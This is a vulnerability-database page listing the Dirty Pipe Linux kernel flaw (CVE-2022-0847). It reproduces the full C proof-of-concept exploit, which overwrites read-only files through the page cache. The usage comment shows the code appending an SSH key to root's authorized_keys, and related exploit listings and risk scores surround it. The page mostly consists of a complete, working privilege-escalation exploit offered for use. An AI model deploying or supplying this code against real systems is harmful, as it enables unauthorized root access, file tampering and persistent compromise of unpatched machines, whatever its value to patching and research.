Dirty Pipe Linux Privilege Escalation Exploit

🗓️ 09 Mar 2022 00:00:00Reported by Max KellermannType

zdt🔗 0day.today👁 501 Views

Dirty Pipe Linux Privilege Escalation Exploit to overwrite file contents even in read-only mount

Reporter	Title	Published	Views	Family All 467
GithubExploit	Exploit for Improper Initialization in Linux Linux_Kernel	7 Jan 202500:25	–	githubexploit
GithubExploit	Exploit for Improper Initialization in Linux Linux_Kernel	25 Mar 202522:16	–	githubexploit
GithubExploit	Exploit for Improper Initialization in Linux Linux_Kernel	10 Mar 202201:27	–	githubexploit
GithubExploit	Exploit for Improper Initialization in Linux Linux_Kernel	12 Mar 202211:31	–	githubexploit
GithubExploit	Exploit for Improper Initialization in Linux Linux_Kernel	8 Mar 202212:43	–	githubexploit
GithubExploit	Exploit for Improper Initialization in Linux Linux_Kernel	7 Feb 202611:15	–	githubexploit
GithubExploit	Exploit for Improper Initialization in Linux Linux_Kernel	8 Mar 202201:17	–	githubexploit
GithubExploit	Exploit for Improper Initialization in Linux Linux_Kernel	18 Mar 202222:51	–	githubexploit
GithubExploit	Exploit for Improper Initialization in Linux Linux_Kernel	22 Mar 202203:17	–	githubexploit
GithubExploit	Exploit for Improper Initialization in Linux Linux_Kernel	4 Jun 202413:25	–	githubexploit

/* SPDX-License-Identifier: GPL-2.0 */
/*
 * Copyright 2022 CM4all GmbH / IONOS SE
 *
 * author: Max Kellermann <[email protected]>
 *
 * Proof-of-concept exploit for the Dirty Pipe
 * vulnerability (CVE-2022-0847) caused by an uninitialized
 * "pipe_buffer.flags" variable.  It demonstrates how to overwrite any
 * file contents in the page cache, even if the file is not permitted
 * to be written, immutable or on a read-only mount.
 *
 * This exploit requires Linux 5.8 or later; the code path was made
 * reachable by commit f6dd975583bd ("pipe: merge
 * anon_pipe_buf*_ops").  The commit did not introduce the bug, it was
 * there before, it just provided an easy way to exploit it.
 *
 * There are two major limitations of this exploit: the offset cannot
 * be on a page boundary (it needs to write one byte before the offset
 * to add a reference to this page to the pipe), and the write cannot
 * cross a page boundary.
 *
 * Example: ./write_anything /root/.ssh/authorized_keys 1 $'\nssh-ed25519 AAA......\n'
 *
 * Further explanation: https://dirtypipe.cm4all.com/
 */

#define _GNU_SOURCE
#include <unistd.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/user.h>

#ifndef PAGE_SIZE
#define PAGE_SIZE 4096
#endif

/**
 * Create a pipe where all "bufs" on the pipe_inode_info ring have the
 * PIPE_BUF_FLAG_CAN_MERGE flag set.
 */
static void prepare_pipe(int p[2])
{
  if (pipe(p)) abort();

  const unsigned pipe_size = fcntl(p[1], F_GETPIPE_SZ);
  static char buffer[4096];

  /* fill the pipe completely; each pipe_buffer will now have
     the PIPE_BUF_FLAG_CAN_MERGE flag */
  for (unsigned r = pipe_size; r > 0;) {
    unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
    write(p[1], buffer, n);
    r -= n;
  }

  /* drain the pipe, freeing all pipe_buffer instances (but
     leaving the flags initialized) */
  for (unsigned r = pipe_size; r > 0;) {
    unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
    read(p[0], buffer, n);
    r -= n;
  }

  /* the pipe is now empty, and if somebody adds a new
     pipe_buffer without initializing its "flags", the buffer
     will be mergeable */
}

int main(int argc, char **argv)
{
  if (argc != 4) {
    fprintf(stderr, "Usage: %s TARGETFILE OFFSET DATA\n", argv[0]);
    return EXIT_FAILURE;
  }

  /* dumb command-line argument parser */
  const char *const path = argv[1];
  loff_t offset = strtoul(argv[2], NULL, 0);
  const char *const data = argv[3];
  const size_t data_size = strlen(data);

  if (offset % PAGE_SIZE == 0) {
    fprintf(stderr, "Sorry, cannot start writing at a page boundary\n");
    return EXIT_FAILURE;
  }

  const loff_t next_page = (offset | (PAGE_SIZE - 1)) + 1;
  const loff_t end_offset = offset + (loff_t)data_size;
  if (end_offset > next_page) {
    fprintf(stderr, "Sorry, cannot write across a page boundary\n");
    return EXIT_FAILURE;
  }

  /* open the input file and validate the specified offset */
  const int fd = open(path, O_RDONLY); // yes, read-only! :-)
  if (fd < 0) {
    perror("open failed");
    return EXIT_FAILURE;
  }

  struct stat st;
  if (fstat(fd, &st)) {
    perror("stat failed");
    return EXIT_FAILURE;
  }

  if (offset > st.st_size) {
    fprintf(stderr, "Offset is not inside the file\n");
    return EXIT_FAILURE;
  }

  if (end_offset > st.st_size) {
    fprintf(stderr, "Sorry, cannot enlarge the file\n");
    return EXIT_FAILURE;
  }

  /* create the pipe with all flags initialized with
     PIPE_BUF_FLAG_CAN_MERGE */
  int p[2];
  prepare_pipe(p);

  /* splice one byte from before the specified offset into the
     pipe; this will add a reference to the page cache, but
     since copy_page_to_iter_pipe() does not initialize the
     "flags", PIPE_BUF_FLAG_CAN_MERGE is still set */
  --offset;
  ssize_t nbytes = splice(fd, &offset, p[1], NULL, 1, 0);
  if (nbytes < 0) {
    perror("splice failed");
    return EXIT_FAILURE;
  }
  if (nbytes == 0) {
    fprintf(stderr, "short splice\n");
    return EXIT_FAILURE;
  }

  /* the following write will not create a new pipe_buffer, but
     will instead write into the page cache, because of the
     PIPE_BUF_FLAG_CAN_MERGE flag */
  nbytes = write(p[1], data, data_size);
  if (nbytes < 0) {
    perror("write failed");
    return EXIT_FAILURE;
  }
  if ((size_t)nbytes < data_size) {
    fprintf(stderr, "short write\n");
    return EXIT_FAILURE;
  }

  printf("It worked!\n");
  return EXIT_SUCCESS;
}

09 Mar 2022 00:00Current

8.2High risk

Vulners AI Score8.2

CVSS 27.2

CVSS 3.17.8

EPSS0.81981